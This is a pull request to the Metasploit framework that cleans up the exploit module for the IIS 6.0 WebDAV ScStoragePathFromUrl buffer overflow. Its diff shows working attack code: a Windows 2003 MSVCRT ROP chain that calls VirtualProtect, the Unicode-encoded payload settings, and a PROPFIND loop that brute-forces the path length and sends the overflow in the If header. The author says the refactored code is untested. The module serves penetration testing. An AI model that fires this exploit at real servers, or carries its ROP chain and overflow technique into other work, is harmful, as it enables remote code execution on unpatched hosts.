### PR TITLE
[clean up] iis_webdav_scstoragepathfromurl

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -43,10 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'         => 2000,
-          'BadChars'      => "\x00",
-          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
-          'DisableNops'   =>  'True',
+          'Space'          => 2000,
+          'BadChars'       => "\x00",
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'    =>  'True',
           'EncoderOptions' =>
             {
               'BufferRegister' => 'ESI',
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'process',
+          'EXITFUNC'       => 'process',
           'PrependMigrate' => true,
         },
       'Targets'        =>
@@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Platform'       => 'win',
       'DisclosureDate' => 'Mar 26 2017',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
+        OptString.new('TARGETURI',  [ true, 'Path of IIS 6 web application', '/']),
         OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]),
         OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]),
       ])
@@ -91,12 +91,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if headers['MS-Author-Via'] == 'DAV' ||
        headers['DASL'] == '<DAV:sql>' ||
        headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
-       headers['Public'] =~ /PROPFIND/ ||
-       headers['Allow'] =~ /PROPFIND/
+       headers['Public'].include?('PROPFIND') ||
+       headers['Allow'].include?('PROPFIND')
       return true
-    else
-      return false
     end
+
+    false
   end
 
   def check
@@ -104,64 +104,67 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => target_uri.path,
       'method' => 'OPTIONS'
     })
-    if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
-      return Exploit::CheckCode::Vulnerable
-    elsif res && supports_webdav?(res.headers)
-      return Exploit::CheckCode::Detected
-    elsif res.nil?
+
+    unless res
+      vprint_error 'Connection failed'
       return Exploit::CheckCode::Unknown
-    else
-      return Exploit::CheckCode::Safe
     end
+
+    unless supports_webdav? res.headers
+      vprint_status 'Server does not support WebDAV'
+      return CheckCode::Safe
+    end
+
+    if res.headers['Server'].include? 'IIS/6.0'
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Detected
   end
 
   # corelan.be
   # rop chain generated with mona.py
-  def create_rop_chain()
-
-    rop_gadgets =
-      [
-        #MSVCRT.dll - all Windows 2003
-        0x77bcb06c, # POP ESI # RETN
-        0x77bef001, # Write pointer # Garbage
-        0x77bb2563, # POP EAX # RETN
-        0x77ba1114, # <- *&VirtualProtect()
-        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-        0x41414141, # junk
-        0x77bbee22, # XCHG EAX,ESI # ADD BYTE PTR DS:[EAX],AL # RETN
-        0x77bc9801, # POP EBP # RETN
-        0x77be2265, # ptr to 'push esp #  ret'
-        0x77bb2563, # POP EAX # RETN
-        0x03C0946F,
-        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
-        0x77bb48d3, # POP EBX, RET
-        0x77bf21e0, # .data
-        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
-        0x77bbfc02, # POP ECX # RETN
-        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
-        0x77bd8c04, # POP EDI # RETN
-        0x77bd8c05, # ROP NOP (-> edi)
-        0x77bb2563, # POP EAX # RETN
-        0x03c0944f,
-        0x77bdd441, # SUB EAX, 03c0940f
-        0x77bb8285, # XCHG EAX,EDX # RETN
-        0x77bb2563, # POP EAX # RETN
-        0x90909090, # nop
-        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
-      ].pack("V*")
-
-    return rop_gadgets
+  def create_rop_chain
+    [
+      #MSVCRT.dll - all Windows 2003
+      0x77bcb06c, # POP ESI # RETN
+      0x77bef001, # Write pointer # Garbage
+      0x77bb2563, # POP EAX # RETN
+      0x77ba1114, # <- *&VirtualProtect()
+      0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+      0x41414141, # junk
+      0x77bbee22, # XCHG EAX,ESI # ADD BYTE PTR DS:[EAX],AL # RETN
+      0x77bc9801, # POP EBP # RETN
+      0x77be2265, # ptr to 'push esp #  ret'
+      0x77bb2563, # POP EAX # RETN
+      0x03C0946F,
+      0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
+      0x77bb48d3, # POP EBX, RET
+      0x77bf21e0, # .data
+      0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
+      0x77bbfc02, # POP ECX # RETN
+      0x77bef001, # W pointer (lpOldProtect) (-> ecx)
+      0x77bd8c04, # POP EDI # RETN
+      0x77bd8c05, # ROP NOP (-> edi)
+      0x77bb2563, # POP EAX # RETN
+      0x03c0944f,
+      0x77bdd441, # SUB EAX, 03c0940f
+      0x77bb8285, # XCHG EAX,EDX # RETN
+      0x77bb2563, # POP EAX # RETN
+      0x90909090, # nop
+      0x77be6591, # PUSHAD # ADD AL,0EF # RETN
+    ].pack("V*")
   end
 
   #encode string as UTF-8 char format that when converted to UTF-16LE
   #will represent chars we want in memory
   def utf_encode_str(str)
-    return str.force_encoding('UTF-16LE').encode('UTF-8')
+    str.force_encoding('UTF-16LE').encode('UTF-8')
   end
 
   #filler chars to be encoded
   def make_junk(len)
-    return utf_encode_str(rand_text_alpha(len))
+    utf_encode_str rand_text_alpha(len)
   end
 
   def exploit
@@ -169,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # these need to be the values from the backend server
     # if testing a reverse proxy setup, these values differ
     # from RHOST and RPORT but can be extracted this way
-    vprint_status("Extracting ServerName and Port")
+    vprint_status('Extracting ServerName and Port')
     res = send_request_raw(
       'method' => 'PROPFIND',
       'headers' => {
@@ -177,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'uri' => target_uri.path
     )
-    fail_with(Failure::BadConfig, "Server did not respond correctly to WebDAV request") if(res.nil? || res.code != 207)
+    fail_with(Failure::BadConfig, 'Server did not respond correctly to WebDAV request') if(res.nil? || res.code != 207)
 
     xml = res.get_xml_document
     url = URI.parse(xml.at("//a:response//a:href").text)
@@ -187,6 +190,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     http_host = "#{server_scheme}://#{server_name}:#{server_port}"
     vprint_status("Using http_host #{http_host}")
+
+    print_status "Trying path length #{min_path_len} to #{max_path_len} ..."
 
     min_path_len.upto(max_path_len) do |path_len|
       vprint_status("Trying path length of #{path_len}...")
@@ -227,27 +232,25 @@ class MetasploitModule < Msf::Exploit::Remote
         buf1 << payload.encoded
         buf1 << ">"
 
-        vprint_status("Sending payload")
+        vprint_status 'Sending payload'
         res = send_request_raw(
           'method' => 'PROPFIND',
+          'uri' => target_uri.path,
           'headers' => {
             'Content-Length' => 0,
             'If' => "#{buf1}"
-          },
-          'uri' => target_uri.path
+          }
         )
-        if res
-          vprint_status("Server returned status #{res.code}")
-          if res.code == 502 || res.code == 400
-            next
-          elsif session_created?
-            return
-          else
-            vprint_status("Unknown Response: #{res.code}")
-          end
-        end
+        next unless res
+
+        vprint_status("Server returned status #{res.code}")
+        next if res.code == 502 || res.code == 400
+
+        return if session_created?
+
+        vprint_status("Unknown Response: #{res.code}")
       rescue ::Errno::ECONNRESET
-        vprint_status("got a connection reset")
+        vprint_status('got a connection reset')
         next
       end
     end

--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -91,8 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if headers['MS-Author-Via'] == 'DAV' ||
        headers['DASL'] == '<DAV:sql>' ||
        headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
-       headers['Public'].include?('PROPFIND') ||
-       headers['Allow'].include?('PROPFIND')
+       headers['Public'].to_s.include?('PROPFIND') ||
+       headers['Allow'].to_s.include?('PROPFIND')
       return true
     end
 
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe
     end
 
-    if res.headers['Server'].include? 'IIS/6.0'
+    if res.headers['Server'].to_s.include? 'IIS/6.0'
       return CheckCode::Vulnerable
     end
 
@@ -256,4 +256,3 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 end
-


### PR DESCRIPTION
The `iis_webdav_scstoragepathfromurl` module currently prints no output unless `verbose` is enabled (#10271). This PR adds a print message so the user at least has some idea that something is happening.

```ruby
print_status "Trying path length #{min_path_len} to #{max_path_len} ..."
```

While I was at it, I also golfed and cleaned up some of the code for style.

In theory, the golfed code should operate exactly the same as the original, however, **I have not tested this code at all**.
